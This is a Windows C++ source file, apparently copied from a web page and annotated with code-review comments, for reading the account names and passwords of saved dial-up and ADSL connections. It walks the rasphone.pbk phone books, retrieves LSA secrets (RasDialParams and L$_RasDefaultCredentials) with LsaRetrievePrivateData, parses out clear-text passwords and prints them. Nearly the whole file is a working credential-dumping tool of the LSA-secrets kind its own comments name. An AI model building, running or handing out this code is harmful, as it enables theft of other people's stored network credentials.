#include <windows.h>
#include<tchar.h>
#include<locale.h>
#include <ras.h>
#include <raserror.h>
#include <shlobj.h>
#include <ntsecapi.h>
#include <tchar.h>
#include <assert.h>
#include <Wtsapi32.h>
#pragma comment(lib,"rasapi32.lib")
#pragma comment(lib,"WtsApi32.lib")
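// One credential record. ParseLsaBuffer() fills UID/login/pass from the LSA
// private-data blob; GetRasEntries() matches UID against the DialParamsUID of
// each phone-book entry and sets `used` when a match is found.
// NOTE(review): `pass` holds a clear-text password for as long as the record
// lives, so the owning array should be scrubbed before it is freed.
//
// The original closed the packing scope with `#pragma pop`, which is not a
// packing directive, so 1-byte packing stayed in force for everything declared
// afterwards. push/pop restores the previous packing explicitly.
#pragma pack(push,1)
typedef struct
{
    TCHAR UID[256];     // dial-params UID, compared with the phone-book DialParamsUID value
    TCHAR pass[256];    // password field copied out of the LSA blob
    TCHAR login[256];   // user-name field copied out of the LSA blob
    BOOL used;          // TRUE once the record was matched to a phone-book entry
}PASSWORDS,*PPASSWORDS;
#pragma pack(pop)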
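// User name of the current session; filled in by main().
TCHAR m_lpCurrentUser[64];
// Next free slot while ParseLsaBuffer() fills m_PassWords; GetRasEntries()
// also increments it each time a record is matched to a phone-book entry.
int m_nUsed;
// Reset to 0 by main(); not otherwise used in this listing.
int m_nCount;
// Number of phone-book entries found; also the element count of m_PassWords.
int m_nRasCount;
// Array of m_nRasCount credential records, allocated in main().
PASSWORDS*m_PassWords;

// Counts the dial-up/broadband entries in the phone-book files.
DWORD GetRasEntryCount();
bool GetRasEntries();
void GetLsaPasswords();
LPTSTR UTF8ToGB2312(LPTSTR UTF8Str);
BOOL Set(LPTSTR DialParamsUID,LPTSTR Name,LPTSTR User,LPTSTR Password,LPTSTR PhoneNumber,LPTSTR Device);
LPTSTR GetLocalSid();
PLSA_UNICODE_STRING GetLsaData(LPTSTR KeyName);
void ParseLsaBuffer(LPCWSTR Buffer,USHORT Length);
void StringToLsaStr(LPTSTR AValue,PLSA_UNICODE_STRING lsa);

// The page fused an HTML <pre> tag into the line above; it is removed here.
// Presumably everything above is head.h and the main source file starts below.
#include "head.h"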
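int main (void)
{
    // Query the user name of the current session. It is used later to build
    // the per-user phone-book path and to look up the account SID.
    LPTSTR szLogName=NULL;
    DWORD dwSize=0;
    if(!WTSQuerySessionInformation(WTS_CURRENT_SERVER_HANDLE,WTS_CURRENT_SESSION,WTSUserName,&szLogName,&dwSize))
        return 0;

    // Bounded, always NUL-terminated copy. The original copied a fixed 64
    // bytes regardless of how long the returned name was, which could read
    // past the WTS buffer and leave the destination unterminated.
    _tcsncpy_s(m_lpCurrentUser,ARRAYSIZE(m_lpCurrentUser),szLogName,_TRUNCATE);
    // The WTS buffer is owned by the caller and was never released before.
    WTSFreeMemory(szLogName);

    // Size the credential table from the number of phone-book entries.
    m_nRasCount=GetRasEntryCount();
    m_PassWords=new PASSWORDS[m_nRasCount];
    // sizeof(m_PassWords) is the size of a pointer; clear the whole array.
    ZeroMemory(m_PassWords,sizeof(PASSWORDS)*m_nRasCount);
    m_nUsed=0;
    m_nCount=0;
    GetRasEntries();

    // The table holds clear-text passwords: scrub it before releasing it.
    SecureZeroMemory(m_PassWords,sizeof(PASSWORDS)*m_nRasCount);
    delete[] m_PassWords;
    m_PassWords=NULL;
    return 0;
}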
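// Counts the entries (INI sections) in the two rasphone.pbk phone books:
// the current user's book under "Documents and Settings" and the all-users
// book under the common application-data folder.
// Returns 0 when the Windows directory cannot be resolved.
DWORD GetRasEntryCount()
{
    int nCount=0;
    LPTSTR lpPhoneBook[2]={0};
    TCHAR szPhoneBook1[MAX_PATH]={0},szPhoneBook2[MAX_PATH]={0};

    // GetWindowsDirectory returns a character count, 0 on failure.
    if(GetWindowsDirectory(szPhoneBook1,ARRAYSIZE(szPhoneBook1))==0)return 0;

    // Keep only the drive root ("C:\"). The original wrote through the result
    // of _tcschr() unchecked and with an unbounded _tcscpy.
    LPTSTR lpRoot=_tcschr(szPhoneBook1,TEXT('\\'));
    if(lpRoot==NULL)return 0;
    lpRoot[1]=TEXT('\0');
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("Documents and Settings\\"));
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),m_lpCurrentUser);
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
    lpPhoneBook[0]=szPhoneBook1;

    // The original formatted szPhoneBook2 into itself (overlapping source and
    // destination) and ignored a failed folder lookup; append instead and
    // skip the all-users book when its folder cannot be resolved.
    if(SHGetSpecialFolderPath(NULL,szPhoneBook2,CSIDL_COMMON_APPDATA,0))
    {
        _tcscat_s(szPhoneBook2,ARRAYSIZE(szPhoneBook2),TEXT("\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
        lpPhoneBook[1]=szPhoneBook2;
    }

    const DWORD nSize=1024*4;
    LPTSTR lpszReturnBuffer=new TCHAR[nSize];
    for(size_t i=0;i<ARRAYSIZE(lpPhoneBook);i++)
    {
        if(lpPhoneBook[i]==NULL)continue;
        // Clear the whole buffer (sizeof on the pointer cleared only a few
        // bytes), so a failed read cannot leave stale or uninitialised
        // section names behind to be counted.
        memset(lpszReturnBuffer,0,nSize*sizeof(TCHAR));
        GetPrivateProfileSectionNames(lpszReturnBuffer,nSize,lpPhoneBook[i]);
        // The result is a list of NUL-terminated names ended by an empty one.
        for(LPTSTR lpSection=lpszReturnBuffer;*lpSection!=TEXT('\0');lpSection+=_tcslen(lpSection)+1)
            nCount++;
    }
    delete[] lpszReturnBuffer;
    return nCount;
}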
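// Walks every entry of the two rasphone.pbk phone books, pairs it (by
// DialParamsUID) with a record previously loaded into m_PassWords by
// GetLsaPasswords(), and hands the result to Set().
// Returns false when the phone-book path cannot be built, true otherwise.
// NOTE(review): m_nUsed is advanced both by ParseLsaBuffer() (as a fill index)
// and here (as a match counter) - confirm which meaning is intended.
bool GetRasEntries()
{
    LPTSTR lpPhoneBook[2]={0};
    TCHAR szPhoneBook1[MAX_PATH]={0},szPhoneBook2[MAX_PATH]={0};

    // GetWindowsDirectory returns a character count, 0 on failure.
    if(GetWindowsDirectory(szPhoneBook1,ARRAYSIZE(szPhoneBook1))==0)return false;

    // Build the per-user path the same way GetRasEntryCount() does: keep the
    // drive root and append. The original overwrote the buffer with a relative
    // "Documents and Settings\" path, so the two functions disagreed.
    LPTSTR lpRoot=_tcschr(szPhoneBook1,TEXT('\\'));
    if(lpRoot==NULL)return false;
    lpRoot[1]=TEXT('\0');
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("Documents and Settings\\"));
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),m_lpCurrentUser);
    _tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
    lpPhoneBook[0]=szPhoneBook1;

    // Append rather than format the buffer into itself, and skip the
    // all-users book when its folder cannot be resolved.
    if(SHGetSpecialFolderPath(NULL,szPhoneBook2,CSIDL_COMMON_APPDATA,0))
    {
        _tcscat_s(szPhoneBook2,ARRAYSIZE(szPhoneBook2),TEXT("\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
        lpPhoneBook[1]=szPhoneBook2;
    }

    // Load the LSA records only on NT-family systems with major version >= 5.
    // The version structure is used only if the query succeeded.
    OSVERSIONINFO osi;
    ZeroMemory(&osi,sizeof(osi));
    osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
    if(GetVersionEx(&osi)&&osi.dwPlatformId==VER_PLATFORM_WIN32_NT&&osi.dwMajorVersion>=5)GetLsaPasswords();

    const DWORD nSize=1024*4;
    LPTSTR lpszReturnBuffer=new TCHAR[nSize];
    for(size_t i=0;i<ARRAYSIZE(lpPhoneBook);i++)
    {
        if(lpPhoneBook[i]==NULL)continue;
        // nSize is a character count; the original cleared only nSize bytes.
        memset(lpszReturnBuffer,0,nSize*sizeof(TCHAR));
        GetPrivateProfileSectionNames(lpszReturnBuffer,nSize,lpPhoneBook[i]);
        for(LPTSTR lpSection=lpszReturnBuffer;*lpSection!=TEXT('\0');lpSection+=_tcslen(lpSection)+1)
        {
            LPTSTR lpRealSection=UTF8ToGB2312(lpSection);
            TCHAR strDialParamsUID[256]={0};
            TCHAR strUserName[256]={0};
            TCHAR strPassWord[256]={0};
            TCHAR strPhoneNumber[256]={0};
            TCHAR strDevice[256]={0};

            DWORD nBufferLen=GetPrivateProfileString(lpSection,_T("DialParamsUID"),0,strDialParamsUID,_countof(strDialParamsUID),lpPhoneBook[i]);
            if(nBufferLen>0&&m_PassWords!=NULL)
            {
                // Find the stored record whose UID equals this entry's DialParamsUID.
                for(int j=0;j<m_nRasCount;j++)
                {
                    if(_tcscmp(strDialParamsUID,m_PassWords[j].UID)==0)
                    {
                        // Bounded copies instead of _tcscpy.
                        _tcsncpy_s(strUserName,_countof(strUserName),m_PassWords[j].login,_TRUNCATE);
                        _tcsncpy_s(strPassWord,_countof(strPassWord),m_PassWords[j].pass,_TRUNCATE);
                        m_PassWords[j].used=TRUE;
                        m_nUsed++;
                        break;
                    }
                }
            }
            GetPrivateProfileString(lpSection,_T("PhoneNumber"),0,strPhoneNumber,_countof(strPhoneNumber),lpPhoneBook[i]);
            GetPrivateProfileString(lpSection,_T("Device"),0,strDevice,_countof(strDevice),lpPhoneBook[i]);
            LPTSTR lpRealDevice=UTF8ToGB2312(strDevice);
            LPTSTR lpRealUserName=UTF8ToGB2312(strUserName);
            Set(strDialParamsUID,lpRealSection,lpRealUserName,strPassWord,strPhoneNumber,lpRealDevice);
            // Do not leave the clear-text password on the stack after use.
            SecureZeroMemory(strPassWord,sizeof(strPassWord));
            delete[] lpRealSection;
            delete[] lpRealUserName;
            delete[] lpRealDevice;
        }
    }
    delete[] lpszReturnBuffer;
    return true;
}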
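// Loads the stored dial-up credential records into m_PassWords.
// It first tries the per-user LSA key built from the account SID (the listing
// labels this format "win2000"), then the fixed key labelled "winxp". The
// first key that yields data is parsed and the function returns.
void GetLsaPasswords()
{
    PLSA_UNICODE_STRING PrivateData=NULL;
    TCHAR Win2k[]=TEXT("RasDialParams!%s#0");
    TCHAR WinXP[]=TEXT("L$_RasDefaultCredentials#0");
    TCHAR temp[256]={0};

    // win2000: per-user key, needs the SID string of the current user.
    LPTSTR lpSid=GetLocalSid();
    if(lpSid)
    {
        // Bounded formatting; wsprintf() had no knowledge of temp's size.
        _sntprintf_s(temp,ARRAYSIZE(temp),_TRUNCATE,Win2k,lpSid);
        // The SID string comes from ConvertSidToStringSid and was leaked before.
        LocalFree(lpSid);
        PrivateData=GetLsaData(temp);
        if(PrivateData)
        {
            ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
            // LsaFreeMemory takes the buffer itself; the original passed the
            // address of the local pointer variable.
            LsaFreeMemory(PrivateData);
            return;
        }
    }

    // winxp: the key name contains no format field, so copy it as is. The
    // original cleared only half of temp and called GetLocalSid() again,
    // leaking a second SID string.
    _tcscpy_s(temp,ARRAYSIZE(temp),WinXP);
    PrivateData=GetLsaData(temp);
    if(PrivateData)
    {
        ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
        LsaFreeMemory(PrivateData);
        return;
    }
}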
// Returns a heap copy of UTF8Str that the caller must release with delete[].
// Despite the name, no character-set conversion is performed: the characters
// are duplicated unchanged. The WCHAR allocation assigned to an LPTSTR means
// this only builds when TCHAR is WCHAR (Unicode build).
LPTSTR UTF8ToGB2312(LPTSTR UTF8Str)
{
    // Character count including the terminating NUL.
    const size_t cchCopy=_tcslen(UTF8Str)+1;
    LPTSTR lpGBStr=new WCHAR[cchCopy];
    memcpy(lpGBStr,UTF8Str,cchCopy*sizeof(WCHAR));
    return lpGBStr;
}
// Output stage: prints the connection name, user name and password of one
// entry to standard output and always returns TRUE.
// DialParamsUID, PhoneNumber and Device are accepted but not used.
// NOTE(review): the password is written in clear text, so it ends up in any
// console capture, redirect or log that receives this program's output.
BOOL Set(LPTSTR DialParamsUID,LPTSTR Name,LPTSTR User,LPTSTR Password,LPTSTR PhoneNumber,LPTSTR Device)
{
    LPCTSTR lpFormat=_T("Conn:%s\nUser:%s\nPass:%s\n");
    _tprintf(lpFormat,Name,User,Password);
    return TRUE;
}
// Looks up the SID of the account named in m_lpCurrentUser and returns it in
// string form, or NULL when any step fails. The string is produced by
// ConvertSidToStringSid (resolved at run time from advapi32.dll); the caller
// owns the returned pointer.
LPTSTR GetLocalSid()
{
    typedef BOOL (WINAPI*ConvertSid2StringSid)(PSID,LPTSTR*);

    // The union reserves sizeof(TCHAR[256]) bytes of storage for the SID.
    union
    {
        SID s;
        TCHAR c[256];
    }Sid;
    TCHAR DomainName[256];
    DWORD sizeSid=sizeof(Sid);
    DWORD sizeDomainName=256;
    SID_NAME_USE peUse;
    LPTSTR pSid=NULL;

    // m_lpCurrentUser is an array, so this test can never be true; it is kept
    // only to leave behaviour untouched.
    if(!m_lpCurrentUser)return NULL;
    if(!LookupAccountName(NULL,m_lpCurrentUser,&Sid,&sizeSid,DomainName,&sizeDomainName,&peUse))return NULL;
    if(!IsValidSid(&Sid))return NULL;

    HINSTANCE hLibrary=LoadLibrary(_T("advapi32.dll"));
    if(!hLibrary)return NULL;

#ifdef _UNICODE
    const char*lpProcName="ConvertSidToStringSidW";
#else
    const char*lpProcName="ConvertSidToStringSidA";
#endif
    ConvertSid2StringSid proc=(ConvertSid2StringSid)GetProcAddress(hLibrary,lpProcName);
    // pSid stays NULL when the export is missing or the conversion fails.
    if(proc)proc(&Sid.s,&pSid);
    FreeLibrary(hLibrary);
    return pSid;
}
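// Reads the LSA private-data item named KeyName from the local system.
// Returns the LSA-allocated result (release it with LsaFreeMemory), or NULL on
// any failure.
// Security note: the policy handle is opened with POLICY_GET_PRIVATE_INFORMATION.
// Reading LSA private data normally requires administrative rights and is the
// behaviour catalogued as MITRE ATT&CK T1003.004 (LSA Secrets), so an
// unexpected process doing this is worth alerting on.
PLSA_UNICODE_STRING GetLsaData(LPTSTR KeyName){
    LSA_OBJECT_ATTRIBUTES LsaObjectAttribs;
    LSA_HANDLE LsaHandle=NULL;
    LSA_UNICODE_STRING LsaKeyName;
    PLSA_UNICODE_STRING OutData=NULL;
    NTSTATUS nts;

    ZeroMemory(&LsaObjectAttribs,sizeof(LsaObjectAttribs));
    nts=LsaOpenPolicy(NULL,&LsaObjectAttribs,POLICY_GET_PRIVATE_INFORMATION,&LsaHandle);
    if(nts!=0)return NULL;

    ZeroMemory(&LsaKeyName,sizeof(LsaKeyName));
    StringToLsaStr(KeyName,&LsaKeyName);
    if(LsaKeyName.Buffer==NULL)
    {
        // Key could not be built; do not leak the policy handle.
        LsaClose(LsaHandle);
        return NULL;
    }

    nts=LsaRetrievePrivateData(LsaHandle,&LsaKeyName,&OutData);
    free(LsaKeyName.Buffer);

    // Close the handle on every path. The original returned early on a failed
    // read and leaked it.
    NTSTATUS ntsClose=LsaClose(LsaHandle);
    if(nts!=0)return NULL;
    if(ntsClose!=0)
    {
        // Keep the original contract (NULL when the close fails), but release
        // the data that was already returned instead of leaking it.
        LsaFreeMemory(OutData);
        return NULL;
    }
    return OutData;
}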
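// Splits an LSA private-data blob into credential records and stores them in
// m_PassWords, starting at index m_nUsed.
// The blob is treated as consecutive NUL-terminated strings, ten per record;
// string 0 is stored as UID, string 5 as login and string 6 as pass.
// Buffer/Length are the Buffer and Length (in bytes) of the LSA result.
// NOTE(review): after the ten strings of a record the outer loop's ++i skips
// one more character - confirm against the real blob layout.
void ParseLsaBuffer(LPCWSTR Buffer,USHORT Length)
{
    TCHAR AnsiPsw[1024];
    if(Buffer==NULL||m_PassWords==NULL)return;

    // Length is caller-supplied and can be up to 65535 bytes; the original
    // memcpy could overrun this stack buffer. Clamp the copy and keep the
    // last element zero so every string scan below terminates in the buffer.
    size_t cbCopy=Length;
    if(cbCopy>sizeof(AnsiPsw)-sizeof(TCHAR))cbCopy=sizeof(AnsiPsw)-sizeof(TCHAR);
    ZeroMemory(AnsiPsw,sizeof(AnsiPsw));
    memcpy(AnsiPsw,Buffer,cbCopy);
    const int nChars=(int)(cbCopy/sizeof(TCHAR));

    for(int i=0;i<nChars-1;++i){
        // m_PassWords holds m_nRasCount records; never write past the end.
        if(m_nUsed<0||m_nUsed>=m_nRasCount)break;
        for(int j=0;j<10&&i<nChars;++j){
            LPCTSTR lpField=AnsiPsw+i;
            switch(j){
            case 0:
                _tcsncpy_s(m_PassWords[m_nUsed].UID,ARRAYSIZE(m_PassWords[m_nUsed].UID),lpField,_TRUNCATE);
                break;
            case 5:
                _tcsncpy_s(m_PassWords[m_nUsed].login,ARRAYSIZE(m_PassWords[m_nUsed].login),lpField,_TRUNCATE);
                break;
            case 6:
                _tcsncpy_s(m_PassWords[m_nUsed].pass,ARRAYSIZE(m_PassWords[m_nUsed].pass),lpField,_TRUNCATE);
                break;
            default:
                break;
            }
            // Step over this string and its terminator.
            i+=(int)_tcslen(lpField)+1;
        }
        ++m_nUsed;
    }
    // The stack copy contained clear-text credentials.
    SecureZeroMemory(AnsiPsw,sizeof(AnsiPsw));
}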
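// Fills *lsa with a malloc()ed copy of AValue (no terminating NUL; Length and
// MaximumLength are byte counts). The caller releases lsa->Buffer with free().
// On failure (NULL input, value too long for the 16-bit length fields, or
// allocation failure) lsa->Buffer is NULL and both lengths are 0.
void StringToLsaStr(LPTSTR AValue,PLSA_UNICODE_STRING lsa)
{
    lsa->Length=0;
    lsa->MaximumLength=0;
    lsa->Buffer=NULL;
    if(AValue==NULL)return;

    // The length fields are USHORT; the original silently truncated.
    const size_t cbValue=_tcslen(AValue)*sizeof(TCHAR);
    if(cbValue>0xFFFF)return;

    // Allocate at least one character so an empty string still gets a buffer.
    // The original multiplied the byte count by sizeof(TCHAR) again and used
    // the result of malloc() unchecked.
    PWSTR lpCopy=(PWSTR)malloc(cbValue?cbValue:sizeof(TCHAR));
    if(lpCopy==NULL)return;
    memcpy(lpCopy,AValue,cbValue);

    lsa->Buffer=lpCopy;
    lsa->Length=(USHORT)cbValue;
    lsa->MaximumLength=lsa->Length;
}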
读取adsl帐号和密码